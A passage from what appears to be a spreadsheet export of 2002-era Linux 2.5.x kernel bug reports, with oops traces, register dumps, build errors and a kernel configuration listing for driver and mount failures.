    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.49 Distribution: ftp.kernel.org Hardware Environment: Alpha LX164 Software Environment: Debian/sid (update about 1 week prior to report) Problem Description: All mounts oops: Unable to handle kernel paging request at virtual address 000000012002e000 mount(192): Oops 0 pc = [&lt;fffffc000044ad20&gt;] ra = [&lt;fffffc00003854c0&gt;] ps = 0000 Not tainted v0 = 0000000000000280 t0 = 0000000000000000 t1 = 000000012002e280 t2 = 0000000000000000 t3 = 0000000000000280 t4 = fffffc00005c0df0 t5 = fffffc0013273d80 t6 = 000000012002e000 t7 = fffffc00132f4000 s0 = 000000012002c280 s1 = fffffc0013272000 s2 = fffffc00132f7ef8 s3 = 0000000000000000 s4 = 00000000c0ed0000 s5 = 0000000120029b60 s6 = 000000011ffffead a0 = fffffc0000a201d0 a1 = 0000000000000000 a2 = 0000000000002000 a3 = 00000000c0ed0000 a4 = 0000000000000000 a5 = 000000011ffffb38 t8 = 0000000000002000 t9 = 0000020000144d60 t10= 0000000000000008 t11= 00000200001bd9c8 pv = fffffc000044ac20 at = fffffc0000385528 gp = fffffc000069e1d0 sp = fffffc00132f7ea8 Trace:fffffc0000385da0 fffffc0000313084 Code: f41ffff5 c3e00013 e480000a 2ffe0000 47ff041f 2ffe0000 &lt;a4270000&gt; 40811524 &gt;&gt;RA; fffffc00003854c0 &lt;copy_mount_options+40/140&gt; &gt;&gt;PC; fffffc000044ad20 &lt;__copy_user+100/1d4&gt; &lt;===== Trace; fffffc0000385da0 &lt;sys_mount+40/160&gt; Trace; fffffc0000313084 &lt;entSys+a4/c0&gt; Code; fffffc000044ad08 &lt;__copy_user+e8/1d4&gt; 0000000000000000 &lt;_PC&gt;: Code; fffffc000044ad08 &lt;__copy_user+e8/1d4&gt; 0: f5 ff 1f f4 bne v0,ffffffffffffffd8 &lt;_PC+0xffffffffffffffd8&gt; fffffc000044ace0 &lt;__copy_user+c0/1d4&gt; Code; fffffc000044ad0c &lt;__copy_user+ec/1d4&gt; 4: 13 00 e0 c3 br 54 &lt;_PC+0x54&gt; fffffc000044ad5c &lt;__copy_user+13c/1d4&gt; Code; fffffc000044ad10 &lt;__copy_user+f0/1d4&gt; 8: 0a 00 80 e4 beq t3,34 &lt;_PC+0x34&gt; fffffc000044ad3c &lt;__copy_user+11c/1d4&gt; Code; fffffc000044ad14 &lt;__copy_user+f4/1d4&gt; c: 00 00 fe 2f unop Code; fffffc000044ad18 &lt;__copy_user+f8/1d4&gt; 10: 1f 04 ff 47 nop Code; fffffc000044ad1c &lt;__copy_user+fc/1d4&gt; 14: 00 00 fe 2f unop Code; fffffc000044ad20 &lt;__copy_user+100/1d4&gt; &lt;===== 18: 00 00 27 a4 ldq t0,0(t6) &lt;===== Code; fffffc000044ad24 &lt;__copy_user+104/1d4&gt; 1c: 24 15 81 40 subq t3,0x8,t3 Steps to reproduce: nothing special - just built and booted. (Built without modules; got an incomplete type error when building with modules. This was built for LX164 rather than generic).</t>
  </si>
  <si>
    <t>PPC-32</t>
  </si>
  <si>
    <t>Load IDE-SCSI module causes OOPS in 2.5.49</t>
  </si>
  <si>
    <t>2002-11-24 21:21 UTC</t>
  </si>
  <si>
    <t>2003-03-06 13:19 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.49 Distribution: Gentoo Hardware Environment: Pentium 3 Software Environment: gcc-2.95.3 Problem Description: Other modules like ide-cd and agpgart load and unload successfully, except the ide-scsi module that cause a kernel oops when loading. I'm using rusty's module tools. Please ask me for info if needed and I have attached: 1. .config 2. dmesg whole output 3. lspci -vvv and here is dmesg's specific output for this case: ERROR: SCSI host `ide-scsi' has no error handling ERROR: This is not a safe way to run your SCSI host ERROR: The error handling must be added to this driver Call Trace: [&lt;c0222aba&gt;] [&lt;c0222d7f&gt;] [&lt;c0124346&gt;] [&lt;c010892b&gt;] scsi0 : SCSI host adapter emulation for IDE ATAPI devices Unable to handle kernel paging request at virtual address e08ab82c printing eip: e08ab82c *pde = 01569067 *pte = 00000000 Oops: 0000 CPU: 0 EIP: 0060:[&lt;e08ab82c&gt;] Not tainted EFLAGS: 00010082 eax: e08ab82c ebx: c17ef080 ecx: c03c03f8 edx: c17ef080 esi: c03c0650 edi: c03c0640 ebp: c03c06f0 esp: d8215d08 ds: 0068 es: 0068 ss: 0068 Process modprobe (pid: 2559, threadinfo=d8214000 task=def92900) Stack: c0200157 c03c0650 c17ef080 c03c0640 c03c033c c0218049 c03c0650 d8214000 00000206 c17ef080 dfd47480 d8214000 c0218695 dfd47480 00000000 c03c0650 c17ef080 00000001 00000000 d8214000 c17ef080 c17ef080 d87caa00 d8215d78 Call Trace: [&lt;c0200157&gt;] [&lt;c0218049&gt;] [&lt;c0218695&gt;] [&lt;c0220f7b&gt;] [&lt;c0221444&gt;] [&lt;c0226052&gt;] [&lt;c0201abb&gt;] [&lt;c02253d6&gt;] [&lt;c0221199&gt;] [&lt;c02210cd&gt;] [&lt;c02208 58&gt;] [&lt;c0226ded&gt;] [&lt;c022730b&gt;] [&lt;c02274eb&gt;] [&lt;c022760f&gt;] [&lt;c022294e&gt;] [&lt;c0 222deb&gt;] [&lt;c0124346&gt;] [&lt;c010892b&gt;] Code: Bad EIP value. &lt;6&gt;note: modprobe[2559] exited with preempt_count 1 scsi: Device offlined - not ready or command retry failed after error recovery: host 0 channel 0 id 0 lun 0 Steps to reproduce: Configure kernel with IDE-SCSI Emulation under ATA section as module. CONFIG_BLK_DEV_IDESCSI=m Then compile, install and modprobe ide-scsi using rusty's mod tools.</t>
  </si>
  <si>
    <t>Power-Off</t>
  </si>
  <si>
    <t>Valdis Kletnieks</t>
  </si>
  <si>
    <t>emu10k1 OSS troubles</t>
  </si>
  <si>
    <t>i386 Linux</t>
  </si>
  <si>
    <t>2002-11-27 06:35 UTC</t>
  </si>
  <si>
    <t>Andreas Gotfredsen</t>
  </si>
  <si>
    <t>2004-01-29 09:41 UTC</t>
  </si>
  <si>
    <t>Rui Sousa</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 Distribution: Gentoo Hardware Environment: Dual Athlon MP 1800+, Tyan Tiger MP, 1024 DDR, Geforce 3 Ti 500, Soundblaster Audigy/Soundblaster Live! Software Environment: Gentoo Linux 1.4-rc1 Problem Description: Either installing the OSS emu10k1 drivers as a module, or compiling it into the kernel, neither works. No /dev/sound/dsp or /dev/sound/dsp1 is spawned, and /dev/sound/mixer isn't spawned either. These drivers do work using a card with an older version of the emu10k1 chip (soundblaster live!). Then, playback which does work using the Soundblaster live! card, doesn't output through the rear speakers, and the Ogain mixer isn't available. As far as I know, the rear speaker sound should work in OSS, and Audigy cards should be support on OSS as well. This bug is very annoying and disables the kernel from desktop use with one of these soundcards. Steps to reproduce: Install kernel 2.5.x, with OSS emu10k1 drivers, either as a module or in-kernel;</t>
  </si>
  <si>
    <t>PCI</t>
  </si>
  <si>
    <t>bzImage build failure on input devices support as module</t>
  </si>
  <si>
    <t>2002-12-01 01:41 UTC</t>
  </si>
  <si>
    <t>2003-02-12 10:02 UTC</t>
  </si>
  <si>
    <t>120 164</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.50 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD TBird 1.4Ghz, 512MB DDR Software Environment: Gentoo 1.4rc1, gcc3.2 Problem Description: build failure during make bzImage. It happens at the very end during linking. echo ' Generating build number' Generating build number . scripts/mkversion &gt; .tmp_version mv -f .tmp_version .version make -f scripts/Makefile.build obj=init Generating include/linux/compile.h (updated) gcc -Wp,-MD,init/.version.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=athlon -Iarch/i386/mach-generic -nostdinc -iwithprefix include -DKBUILD_BASENAME=version -DKBUILD_MODNAME=version -c -o init/version.o init/version.c ld -m elf_i386 -r -o init/built-in.o init/main.o init/version.o init/do_mounts.o init/initramfs.o ld -m elf_i386 -e stext -T arch/i386/vmlinux.lds.s arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/built-in.o --start-group usr/built-in.o arch/i386/kernel/built-in.o arch/i386/mm/built-in.o arch/i386/mach-generic/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built-in.o security/built-in.o crypto/built-in.o lib/lib.a arch/i386/lib/lib.a drivers/built-in.o sound/built-in.o arch/i386/pci/built-in.o net/built-in.o --end-group -o vmlinux drivers/built-in.o: In function `kd_nosound': drivers/built-in.o(.text+0x15973): undefined reference to `input_event' drivers/built-in.o(.text+0x1599f): undefined reference to `input_event' drivers/built-in.o: In function `kd_mksound': drivers/built-in.o(.text+0x15a5e): undefined reference to `input_event' drivers/built-in.o: In function `kbd_bh': drivers/built-in.o(.text+0x16962): undefined reference to `input_event' drivers/built-in.o(.text+0x16985): undefined reference to `input_event' drivers/built-in.o(.text+0x169a4): more undefined references to `input_event' follow drivers/built-in.o: In function `kbd_connect': drivers/built-in.o(.text+0x16eb4): undefined reference to `input_open_device' drivers/built-in.o: In function `kbd_disconnect': drivers/built-in.o(.text+0x16edf): undefined reference to `input_close_device' drivers/built-in.o: In function `kbd_init': drivers/built-in.o(.init.text+0x10a1): undefined reference to `input_register_handler' make: *** [vmlinux] Error 1 Steps to reproduce: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_SWAP=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_NET=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_KMOD=y # # Processor type and features # # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y # CONFIG_X86_UP_APIC is not set CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_CPU_FREQ is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # # # ACPI Support # # CONFIG_ACPI is not set # CONFIG_PM is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_SCx200 is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=m # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m # CONFIG_PARPORT_PC is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play configuration # # CONFIG_PNP is not set # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL device support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=m # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y # CONFIG_BLK_DEV_GENERIC is not set CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set CONFIG_BLK_DEV_HPT366=y # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NFORCE is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # CONFIG_SCSI=m # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y # CONFIG_SCSI_REPORT_LUNS is not set CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_DMA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C7xx is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_NCR53C8XX is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # CONFIG_IEEE1394=m # # Device Drivers # # CONFIG_IEEE1394_PCILYNX is not set # CONFIG_IEEE1394_OHCI1394 is not set # # Protocol Drivers # # CONFIG_IEEE1394_SBP2 is not set # CONFIG_IEEE1394_ETH1394 is not set # CONFIG_IEEE1394_RAWIO is not set # CONFIG_IEEE1394_CMP is not set # CONFIG_IEEE1394_VERBOSEDEBUG is not set # # I2O device support # # CONFIG_I2O is not set # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_FILTER=y CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set CONFIG_INET_ECN=y # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_XFRM_USER is not set # # IP: Netfilter Configuration # # CONFIG_IP_NF_CONNTRACK is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=m # CONFIG_IP_NF_MATCH_LIMIT is not set CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m # CONFIG_IP_NF_MATCH_MARK is not set # CONFIG_IP_NF_MATCH_MULTIPORT is not set # CONFIG_IP_NF_MATCH_TOS is not set # CONFIG_IP_NF_MATCH_ECN is not set # CONFIG_IP_NF_MATCH_DSCP is not set # CONFIG_IP_NF_MATCH_AH_ESP is not set # CONFIG_IP_NF_MATCH_LENGTH is not set # CONFIG_IP_NF_MATCH_TTL is not set # CONFIG_IP_NF_MATCH_TCPMSS is not set # CONFIG_IP_NF_MATCH_UNCLEAN is not set # CONFIG_IP_NF_MATCH_OWNER is not set CONFIG_IP_NF_FILTER=m # CONFIG_IP_NF_TARGET_REJECT is not set # CONFIG_IP_NF_TARGET_MIRROR is not set # CONFIG_IP_NF_MANGLE is not set # CONFIG_IP_NF_TARGET_LOG is not set # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_IP_NF_TARGET_TCPMSS is not set # CONFIG_IP_NF_ARPTABLES is not set # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set # CONFIG_IPV6 is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # # Network device support # CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=y # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_NET_PCI is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=m # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=m # CONFIG_INPUT_MOUSEDEV_PSAUX is not set CONFIG_INPUT_MOUSEDEV_SCREEN_X=1600 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=1024 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=m # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=m CONFIG_SERIO_I8042=m CONFIG_SERIO_SERPORT=m # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=m # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set # CONFIG_INPUT_MOUSE is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=m # CONFIG_TIPAR is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_ALGOBIT=m # CONFIG_I2C_PHILIPSPAR is not set # CONFIG_I2C_ELV is not set # CONFIG_I2C_VELLEMAN is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_ALGOPCF is not set CONFIG_I2C_CHARDEV=m CONFIG_I2C_PROC=m # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_INTEL_RNG is not set # CONFIG_AMD_RNG is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=m # CONFIG_AGP_INTEL is not set # CONFIG_AGP_I810 is not set # CONFIG_AGP_VIA is not set CONFIG_AGP_AMD=y # CONFIG_AGP_SIS is not set # CONFIG_AGP_ALI is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_AMD_8151 is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_MGA is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # File systems # # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y CONFIG_REISERFS_FS=m # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y # CONFIG_EXT3_FS_POSIX_ACL is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set # CONFIG_FAT_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set CONFIG_TMPFS=y CONFIG_RAMFS=y CONFIG_ISO9660_FS=m CONFIG_JOLIET=y # CONFIG_ZISOFS is not set # CONFIG_JFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_VXFS_FS is not set CONFIG_NTFS_FS=m # CONFIG_NTFS_DEBUG is not set # CONFIG_NTFS_RW is not set # CONFIG_HPFS_FS is not set CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y CONFIG_DEVFS_MOUNT=y # CONFIG_DEVFS_DEBUG is not set # CONFIG_DEVPTS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_SYSV_FS is not set # CONFIG_UDF_FS is not set # CONFIG_UFS_FS is not set # CONFIG_XFS_FS is not set # # Network File Systems # # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_NFS_V4=y CONFIG_NFSD=y CONFIG_NFSD_V3=y CONFIG_NFSD_V4=y # CONFIG_NFSD_TCP is not set CONFIG_SUNRPC=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y # CONFIG_CIFS is not set CONFIG_SMB_FS=m # CONFIG_SMB_NLS_DEFAULT is not set # CONFIG_NCP_FS is not set # CONFIG_AFS_FS is not set CONFIG_FS_MBCACHE=y # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Console drivers # CONFIG_VGA_CONSOLE=y CONFIG_VIDEO_SELECT=y # 